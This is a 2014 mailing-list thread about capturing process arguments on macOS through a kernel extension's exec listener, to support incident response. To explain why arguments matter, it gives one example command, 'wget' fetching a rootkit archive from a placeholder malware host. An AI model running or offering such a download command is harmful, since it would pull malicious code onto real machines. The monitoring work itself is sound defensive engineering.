Re: accessing argv on exec
- Subject: Re: accessing argv on exec
- From: Peter Moody <email@hidden>
- Date: Tue, 11 Nov 2014 10:04:44 -0800
On Tue, Nov 11 2014 at 07:18, Evan Lojewski wrote:
> Hi Pete,
>
> From my (limited) scan through kern_exec.c, it doesn't look like there is a
> good way to get access to the full command line. Someone at Apple will
> probably be able to suggest a good option.
>
> *IF* this is a non-production kext, it is possible to update the execsw
> table to allow your kext to get access to this information, however it does
> require using private symbols. If you'd like an example on how to do that
> let me know and I'll send some code, but hopefully Apple has a better
> option that they can reply with first.
Hey Evan,
I'd love to see some code. I don't think I'll be able to convince our
macops team to support it, but seeing how it could be done is still
probably worthwhile.
re auditd: we're actually doing something like that right now, but AIUI
our IR team has found it lacking. I've spent the last year or so
implementing for linux what I'm looking to implement here for the mac,
hence the noobish question.
Cheers,
peter
> -- Evan Lojewski
>
> On Mon, Nov 10, 2014 at 4:02 PM, Peter Moody <email@hidden> wrote:
>
>> Hey folks,
>>
>> apologies for what will likely be a noobish question, I'm just getting
>> acquainted with xnu and kexts and all that.
>>
>> I'm interested in monitoring process creation (and termination) on the
>> mac. It looks like I can use a kext that registers a listener for
>> kauth_fileop_exec to be notified of an exec, and the callback is:
>>
>> a) given a char* of the path to the binary.
>> b) run in the context of the newly executing binary (so proc_self()
>> and the like work for getting pid/ppid, etc).
>>
>> but is there any way that I can actually access the argv that was passed
>> to the execve call?
>>
>> I'm trying to do this to help our incident response capabilities, where
>> obviously just seeing that 'wget' was called is a lot less informative
>> than seeing 'wget http://malware.badguy/rookkit.tgz'
>>
>> Cheers,
>> peter
>> _______________________________________________
>> Do not post admin requests to the list. They will be ignored.
>> Darwin-kernel mailing list (email@hidden)
>> Help/Unsubscribe/Update your Subscription:
>>
>> This email sent to email@hidden